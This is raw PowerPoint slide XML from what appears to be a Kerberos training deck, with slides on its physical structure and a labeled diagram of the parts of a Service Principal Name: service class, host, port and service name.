        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120946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Service Principal Names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="4524315"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Known as SPN—it is a string used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>uniquely identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a service.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lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—is the type of service. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—is the server that is running the service (FQDN/NetBIOS). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—is the port number the service is listening on (optional). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Service name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—is the name of the service (Distinguished Name (DN), Globally Unique Identifier (GUID), and FQDN) (optional).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B50B45-33C8-44C3-84BA-85EAF827A9C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1547664" y="2132856"/>
            <a:ext cx="5289977" cy="1566133"/>
            <a:chOff x="566274" y="1700808"/>
            <a:chExt cx="5289977" cy="1566133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Text Placeholder 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49EE79AA-E431-415D-9BE5-07F7C0E351E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="566274" y="1700815"/>
              <a:ext cx="1196827" cy="230832"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst>
                  <a:tab pos="628650" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="1800" b="0" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="949699"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1800" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1600" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1600" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="22860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defTabSz="685772">
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="E19004"/>
                </a:buClr>
                <a:tabLst>
                  <a:tab pos="471488" algn="l"/>
                </a:tabLst>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Service Class</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Text Placeholder 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D04388-7294-4ADC-88D8-BDDEBC777E04}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1951362" y="1700812"/>
              <a:ext cx="1196827" cy="230832"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst>
                  <a:tab pos="628650" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="1800" b="0" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="949699"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1800" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1600" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1600" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="22860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defTabSz="685772">
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="E19004"/>
                </a:buClr>
                <a:tabLst>
                  <a:tab pos="471488" algn="l"/>
                </a:tabLst>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Host Name</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Text Placeholder 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9A16C01-CF39-47EE-8E0B-72FAFC1714FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3080952" y="1700812"/>
              <a:ext cx="1196827" cy="230832"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst>
                  <a:tab pos="628650" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="1800" b="0" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="949699"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1800" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1600" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1600" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="22860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defTabSz="685772">
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="E19004"/>
                </a:buClr>
                <a:tabLst>
                  <a:tab pos="471488" algn="l"/>
                </a:tabLst>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Port Number</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Elbow Connector 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD5B022-6741-43B0-997E-6CFA57CA40E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="3534777" y="2062162"/>
              <a:ext cx="941342" cy="813477"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Text Placeholder 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5462868-4587-4099-9965-21D43AD0253D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4230709" y="1700808"/>
              <a:ext cx="1519463" cy="230832"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst>
                  <a:tab pos="628650" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="1800" b="0" kern="1200">
                  <a:solidFill>
                    <a:srgbClr val="949699"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1800" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1600" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr sz="1600" b="1" kern="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="22860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defTabSz="685772">
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="E19004"/>
                </a:buClr>
                <a:tabLst>
                  <a:tab pos="471488" algn="l"/>
                </a:tabLst>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Service Name</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Elbow Connector 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{501B7A41-D1CC-41DA-B6D0-E2888A48BDC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="4516422" y="2263890"/>
              <a:ext cx="927898" cy="423464"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Elbow Connector 10">
              <a:extLst>
